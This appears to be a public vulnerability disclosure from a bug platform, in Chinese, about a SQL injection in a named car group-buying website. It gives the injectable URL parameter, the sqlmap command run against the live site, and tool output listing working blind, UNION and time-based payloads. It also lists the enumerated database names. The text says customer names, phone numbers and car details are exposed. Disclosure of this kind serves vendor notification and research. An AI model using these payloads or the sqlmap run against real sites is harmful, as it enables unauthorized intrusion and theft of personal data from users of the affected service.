2015-05-05: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-06-19: 厂商已经主动忽略漏洞,细节向公众公开
快车团购某站存在SQL注入导致大量用户信息泄露
一个“往期回顾”引发的SQL注入:
http://www.5757car.com/review.php?id=70
有用户大量购车信息,包括手机号,车型,购车人名字等等
python sqlmap.py -u "www.5757car.com/review.php?id=70"
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=70 AND 9860=9860 Type: UNION query Title: MySQL UNION query (NULL) - 32 columns Payload: id=-5908 UNION ALL SELECT NULL,CONCAT(0x3a6869753a,0x66626a59556b66564a7a,0x3a626a783a),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=70 AND SLEEP(5)---[12:07:50] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL 5.0.11[12:07:50] [INFO] fetching database names[12:07:50] [INFO] the SQL query used returns 7 entries[12:07:50] [INFO] resumed: "information_schema"[12:07:50] [INFO] resumed: "1717car"[12:07:50] [INFO] resumed: "5757car"[12:07:50] [INFO] resumed: "5757wx"[12:07:50] [INFO] resumed: "mysql"[12:07:50] [INFO] resumed: "performance_schema"[12:07:50] [INFO] resumed: "system"available databases [7]:[*] 1717car[*] 5757car[*] 5757wx[*] information_schema[*] mysql[*] performance_schema[*] system
有图有真相,像这样:
再来,像这样:
起码加个过滤什么的吧
未能联系到厂商或者厂商积极拒绝
漏洞Rank:8 (WooYun评价)
